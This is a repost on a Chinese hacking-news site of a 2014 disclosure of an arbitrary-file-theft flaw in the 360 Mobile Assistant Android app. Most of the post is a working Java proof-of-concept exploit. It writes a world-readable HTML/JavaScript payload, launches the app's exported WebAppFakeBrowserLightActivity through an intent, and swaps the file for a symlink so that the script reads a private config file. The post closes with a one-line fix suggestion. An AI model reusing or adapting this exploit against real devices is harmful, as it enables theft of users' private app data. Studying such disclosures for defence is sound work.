记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

360手机助手任意数据窃取漏洞

2014-04-18 21:45

利用符号链接,可以绕过文件同源性策略的限制,调用com.qihoo.lightapp.WebAppFakeBrowserLightActivity组件解析执行特定的JavaScript脚本,可以窃取任意私有文件的内容。

具体利用可参考刚公布出来的firefox此类漏洞的利用,详细url参看: https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.html

POC如下(借鉴x3xtxt的代码):

String sensitive_file_name = "/data/data/com.qihoo.appstore/shared_prefs/common_config.xml";



DP_WebViewReadAnyFilePoC(sensitive_file_name);

}



@Override

public boolean onCreateOptionsMenu(Menu menu) {

// Inflate the menu; this adds items to the action bar if it is present.

getMenuInflater().inflate(R.menu.main, menu);

return true;

}





public void DP_WebViewReadAnyFilePoC(String targetfile){



try{







String shell_poc = "/data/data/"+getApplicationContext().getPackageName()+"/files/shellpoc.html";







write_payload_file();



cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});











String pkgName = "com.qihoo.appstore";



String activityName = "com.qihoo.lightapp.WebAppFakeBrowserLightActivity";



String url = "file://"+shell_poc;







Intent intent = new Intent();



intent.setAction("com.qihoo.light.action.WEBAPP_LINK");



intent.setComponent(new ComponentName(pkgName, activityName));



intent.setData(Uri.parse(url));



startActivity(intent);







Thread.sleep(2000);







cmdexec(new String[] {"/system/bin/rm", shell_poc});



cmdexec(new String[] {"/system/bin/ln", "-s", targetfile, shell_poc});



cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});







Thread.sleep(5000);







cmdexec(new String[] {"/system/bin/rm", shell_poc});



}catch(Exception e){



debugInfo(e.getMessage());



}



}







@SuppressWarnings("deprecation")



public void write_payload_file(){



String payloadStr = "function getContent(){ \n" +



" var url = location.href; \n" +



" var xmlhttp; \n" +



" if(window.XMLHttpRequest){ \n" +



"xmlhttp=new XMLHttpRequest(); \n" +



" }else{ \n" +



"xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); \n" +



" } \n" +



" \n" +



" xmlhttp.onreadystatechange=function() \n" +



" { \n" +



"if (xmlhttp.readyState==4) \n" +



"{ \n" +







" alert(xmlhttp.responseText); \n" +



"} \n" +



" } \n" +



" xmlhttp.open(\"GET\",url,true); \n" +



" xmlhttp.send(); \n" +



"} \n" +



" \n" +



"setTimeout(getContent,4000); \n";



String htmlStr = "<html> \n" +



"<head><title>Steal Sensitive Information PoC</title></head> \n" +



"<body> \n" +



" <script type=\"text/javascript\"> \n" +



payloadStr +



" </script> \n" +



"</body> \n" +



"</html>";



try{



FileOutputStream fOut = openFileOutput("shellpoc.html", Context.MODE_WORLD_READABLE);



fOut.write(htmlStr.getBytes());



fOut.close();



}catch(Exception e){



debugInfo(e.getMessage());



}



}







public void cmdexec(String[] cmd){



try{



Runtime.getRuntime().exec(cmd);



}catch(Exception e){



debugInfo(e.getMessage());



}



}

漏洞证明:

2.jpg

修复方案:

限制符号链接

知识来源: www.wooyun.org/bugs/wooyun-2014-049252

阅读:68638 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“360手机助手任意数据窃取漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云